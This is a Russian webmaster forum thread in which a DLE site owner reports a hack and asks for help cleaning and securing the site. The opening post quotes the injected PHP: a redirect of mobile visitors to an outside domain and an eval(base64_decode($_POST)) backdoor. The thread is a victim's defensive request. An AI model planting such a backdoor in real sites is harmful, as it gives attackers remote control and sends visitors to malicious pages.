Форум Сайтостроение Веб-строительство

Взломали DLE. Как защититься?

L
На сайте с 17.05.2013
Offline
88
luckydan
1551

В файлах index.php, engine/data/dbconfig.php

вначале файла вставил кто-то огромный кусок кода: 

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://uanetru.com/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

Таких строчек дофига

+ аналогичный код присутствует в htaccess (только в виде правил для редиректа)

Как починить сайт и защититься? Где найти уязвимость? Странно как могли вставить этот код ведь права на все эти файлы 644

---------- Добавлено 16.07.2014 в 02:18 ----------

+ как просканировать все файлы сайта на предмет левого кода?

virustotal.com показывает что на сайте 4 вируса

Показатель выявления: 4 / 57
ADMINUSLabs Malicious site
ESET Malware site
Fortinet Malware site
Yandex Safebrowsing Malware site

Как выявить эти вирусы на сайте?

Plutishe
На сайте с 06.03.2006
Offline
205
Plutishe
#1

Скрипт Ай-Болит от всей нечести защитит )

Хостинг за РУБЛИ (http://yousite.ru/h) | VPS/VDS на платформе: XEN c администрированием (http://yousite.ru/v) | Регистрация доменов (http://yousite.ru/d)
N
На сайте с 06.05.2007
Offline
419
netwind
#2
Plutishe:
Скрипт Ай-Болит от всей нечести защитит )

Не защитит. Читайте мануал.

Удалит некоторые известные ему явно вредносные скрипты, которые потом снова появятся.

Кнопка вызова админа ()
L
На сайте с 17.05.2013
Offline
88
luckydan
#3

обновил ДЛЕ, прогнал айболитом, удалил все что нашел айболит.

Сейчас при заходе на сайт снова ругается нод32:

ESET NOD32 Antivirus

Обнаружена угроза

Доступ к веб-странице заблокирован.

Угроза: HTML/ScrInject.B.Gen вирус

virustotal.com показывает 3 вируса:

Fortinet Malware site

Google Safebrowsing Malware site

Yandex Safebrowsing Malware site

Как их понаходить эти вирусы?

Надежная защита пользователей Яндекс.Бар Хакеры атакуют видео поисковик Роскачество составило рейтинг лучшего
Leksusisus
На сайте с 12.02.2012
Offline
62
Leksusisus
#4

Так а логи посмотреть не как чтоль на хостинге? А так советую купить лицензию, если сайт стоящий!

L
На сайте с 17.05.2013
Offline
88
luckydan
#5

Что даст просмотр логов? Вирус мог быть устнаовлен мне например год назад. И в логах этого давно нет

lutskboy
На сайте с 22.11.2013
Offline
186
lutskboy
#6

если не установлены модули, то обновляемся минимум до 10.1 версии и все

---------- Добавлено 22.07.2014 в 22:25 ----------

и чистим шаблон

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#7

можно не обновляться, достаточно почистить от вставок и поставить патчи безопасности.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
siv1987
На сайте с 02.04.2009
Offline
427
siv1987
#8
luckydan:
Что даст просмотр логов?
luckydan:
Вирус мог быть устнаовлен мне например год назад
luckydan:
обновил ДЛЕ

На сколько я знаю при обновлении обычно старые файлы заменяются на новые? Или вы как обновлялись?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий